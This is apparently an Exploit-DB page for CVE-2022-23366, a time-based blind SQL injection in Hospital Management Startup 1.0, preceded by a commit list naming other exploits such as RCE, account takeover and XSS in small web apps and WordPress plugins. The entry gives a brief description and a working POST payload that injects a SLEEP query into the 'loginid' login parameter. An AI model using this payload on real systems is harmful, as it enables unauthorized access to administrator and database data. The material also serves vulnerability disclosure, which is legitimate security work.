a6102b7922
8 changes to exploits/shellcodes Cain & Abel 4.9.56 - Unquoted Service Path Hospital Management Startup 1.0 - 'Multiple' SQLi Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated) Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated) Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated) WordPress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS) WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)
34 lines
No EOL
1,020 B
Text
34 lines
No EOL
1,020 B
Text
# Exploit Title: Hospital Management Startup 1.0 - 'loginid' SQLi
|
|
# Exploit Author: nu11secur1ty
|
|
# Date: 02.10.2022
|
|
# Vendor: https://github.com/kabirkhyrul
|
|
# Software: https://github.com/kabirkhyrul/HMS
|
|
# CVE-2022-23366
|
|
|
|
# Description:
|
|
The loginid and password parameters from Hospital Management Startup
|
|
1.0 appear to be vulnerable to SQL injection attacks.
|
|
The attacker can retrieve all information from the administrator
|
|
account of the system and he can use the information for malicious
|
|
purposes!
|
|
WARNING: If this is in some external domain, or some subdomain, or
|
|
internal, this will be extremely dangerous!
|
|
|
|
Status: CRITICAL
|
|
|
|
|
|
[+] Payloads:
|
|
|
|
```mysql
|
|
---
|
|
Parameter: loginid (POST)
|
|
Type: time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
|
Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND
|
|
(SELECT 1959 FROM (SELECT(SLEEP(3)))PuyC) AND
|
|
'sDHP'='sDHP&rememberme=on&submit=Login
|
|
---
|
|
|
|
```
|
|
# Reproduce:
|
|
https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-23366 |